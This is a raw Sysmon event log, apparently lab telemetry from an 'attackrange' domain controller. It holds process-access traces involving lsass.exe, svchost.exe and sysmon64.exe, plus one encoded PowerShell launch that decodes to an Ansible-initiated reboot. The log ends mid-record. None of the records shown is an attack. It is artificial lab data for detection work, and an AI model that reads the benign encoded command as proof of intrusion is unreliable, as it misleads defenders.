10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.857{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.778{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA1-6005-0700-00000000A201}720C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.747{59A5CD1D-8E21-6005-D802-00000000A201}51163676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FFA95C9331B)|UNKNOWN(00007FFA951341A5)|UNKNOWN(00007FFA95133E76)|UNKNOWN(00007FFA95BE54DB)|UNKNOWN(00007FFA950F4A0C)|UNKNOWN(00007FFA95152EDB)|UNKNOWN(00007FFA95136540)|UNKNOWN(00007FFA95136540)|UNKNOWN(00007FFA951363D1)|UNKNOWN(00007FFA95128356)|UNKNOWN(00007FFA95134889)|UNKNOWN(00007FFA9513447C)|UNKNOWN(00007FFA951341A5)|UNKNOWN(00007FFA95133E76)|UNKNOWN(00007FFA95BE54DB)|UNKNOWN(00007FFA9511ACD7)|UNKNOWN(00007FFA9511A2A7) 154100x8000000000000000545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.754{59A5CD1D-8E21-6005-D902-00000000A201}4320C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E21-6005-D802-00000000A201}5116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 